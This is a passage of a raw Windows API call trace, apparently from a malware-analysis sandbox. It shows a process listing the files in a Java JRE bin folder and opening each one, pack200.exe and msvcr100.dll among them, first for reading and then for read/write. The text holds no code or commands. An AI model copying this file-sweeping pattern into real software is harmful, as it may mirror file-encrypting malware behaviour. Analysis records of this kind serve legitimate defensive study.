dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0093.623] GetFileType (hFile=0x360) returned 0x1 [0093.623] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46198 | out: hHeap=0x20000) returned 1 [0093.623] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0093.624] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0093.624] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0093.624] CloseHandle (hObject=0x360) returned 1 [0093.624] AreFileApisANSI () returned 1 [0093.624] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0093.624] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x66) returned 0x466d8 [0093.624] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x466d8, cchWideChar=51 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\pack200.exe") returned 51 [0093.624] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\pack200.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\pack200.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0093.624] GetFileType (hFile=0x360) returned 0x1 [0093.624] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x466d8 | out: hHeap=0x20000) returned 1 [0093.624] CloseHandle (hObject=0x360) returned 1 [0093.625] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.625] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.625] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.625] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0093.625] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.625] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.625] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.625] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0093.625] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.625] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.625] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.625] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.625] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.625] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.625] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.625] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.625] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.625] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.625] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0093.625] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.625] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0093.625] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.625] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.625] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.625] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0093.625] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.625] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.625] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.625] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.625] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.625] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0093.625] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.625] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.625] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.625] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.625] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.625] AreFileApisANSI () returned 1 [0093.626] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0093.626] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x66) returned 0x46358 [0093.626] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x46358, cchWideChar=51 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\pack200.exe") returned 51 [0093.626] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\pack200.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\pack200.exe"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89ee6c2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89ee6c2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89ee6c2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4040)) returned 1 [0093.626] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46358 | out: hHeap=0x20000) returned 1 [0093.626] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0093.626] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0093.626] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0093.626] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.626] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.626] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa89ee6c2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa0f2a2bf, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa89ee6c2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="plugin2", cAlternateFileName="")) returned 1 [0093.626] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0093.626] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35270 [0093.626] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0093.626] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35270 | out: hHeap=0x20000) returned 1 [0093.626] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0093.626] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35190 [0093.626] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0093.626] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35190 | out: hHeap=0x20000) returned 1 [0093.626] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d3c8 [0093.626] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a9b0 [0093.626] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d3c8 | out: hHeap=0x20000) returned 1 [0093.626] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0093.626] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a9b0 | out: hHeap=0x20000) returned 1 [0093.626] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.626] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.626] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.626] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.626] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0093.626] AreFileApisANSI () returned 1 [0093.626] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\plugin2", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\plugin2", lpUsedDefaultChar=0x0) returned 47 [0093.626] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0093.626] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.626] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.626] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0093.627] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0093.627] AreFileApisANSI () returned 1 [0093.627] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 47 [0093.627] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x719c8 [0093.627] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x719c8, cchWideChar=47 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\plugin2") returned 47 [0093.627] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\plugin2" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\plugin2"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.627] GetLastError () returned 0x5 [0093.627] GetLastError () returned 0x5 [0093.627] SetLastError (dwErrCode=0x5) [0093.627] GetLastError () returned 0x5 [0093.627] SetLastError (dwErrCode=0x5) [0093.627] GetLastError () returned 0x5 [0093.627] SetLastError (dwErrCode=0x5) [0093.627] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0093.627] AreFileApisANSI () returned 1 [0093.627] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 47 [0093.627] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71960 [0093.627] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x71960, cchWideChar=47 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\plugin2") returned 47 [0093.627] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\plugin2" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\plugin2"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.627] GetLastError () returned 0x5 [0093.628] GetLastError () returned 0x5 [0093.628] SetLastError (dwErrCode=0x5) [0093.628] GetLastError () returned 0x5 [0093.628] SetLastError (dwErrCode=0x5) [0093.628] GetLastError () returned 0x5 [0093.628] SetLastError (dwErrCode=0x5) [0093.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0093.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0093.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0093.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0093.628] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.628] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.628] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.628] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.628] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cdf0 [0093.628] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x69e30 [0093.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cdf0 | out: hHeap=0x20000) returned 1 [0093.628] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0093.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69e30 | out: hHeap=0x20000) returned 1 [0093.628] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89ee6c2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89ee6c2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89ee6c2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4040, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="policytool.exe", cAlternateFileName="POLICY~1.EXE")) returned 1 [0093.628] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.628] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.628] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0093.628] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0093.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.628] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0093.628] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f10 [0093.628] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0093.628] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0093.628] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a368 [0093.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0093.628] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\plugin2\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78550 [0093.629] FindNextFileW (in: hFindFile=0x78550, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa89ee6c2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa0f2a2bf, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa89ee6c2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.629] FindNextFileW (in: hFindFile=0x78550, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89ee6c2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89ee6c2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89ee6c2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xca750, dwReserved0=0x0, dwReserved1=0x0, cFileName="msvcr100.dll", cAlternateFileName="")) returned 1 [0093.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0093.629] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.629] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.629] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.629] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0093.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.629] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0093.629] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0093.629] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46278 [0093.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0093.629] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0093.629] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35110 [0093.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0093.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35110 | out: hHeap=0x20000) returned 1 [0093.629] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0093.629] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0093.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0093.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0093.629] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.629] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0093.629] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.629] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a238 [0093.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0093.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.629] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e250 [0093.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a238 | out: hHeap=0x20000) returned 1 [0093.629] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.629] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.629] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.630] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.630] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e250 | out: hHeap=0x20000) returned 1 [0093.630] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.630] AreFileApisANSI () returned 1 [0093.630] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\plugin2\\msvcr100.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\plugin2\\msvcr100.dll", lpUsedDefaultChar=0x0) returned 60 [0093.630] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0093.630] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.630] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.630] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0093.630] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0093.630] AreFileApisANSI () returned 1 [0093.630] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 60 [0093.630] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a5b0 [0093.630] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x6a5b0, cchWideChar=60 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\plugin2\\msvcr100.dll") returned 60 [0093.630] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\plugin2\\msvcr100.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\plugin2\\msvcr100.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0093.630] GetFileType (hFile=0x368) returned 0x1 [0093.630] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a5b0 | out: hHeap=0x20000) returned 1 [0093.630] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0093.631] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0093.631] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0093.631] CloseHandle (hObject=0x368) returned 1 [0093.631] AreFileApisANSI () returned 1 [0093.631] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 60 [0093.631] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a3b0 [0093.631] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=60 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\plugin2\\msvcr100.dll") returned 60 [0093.631] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\plugin2\\msvcr100.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\plugin2\\msvcr100.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, 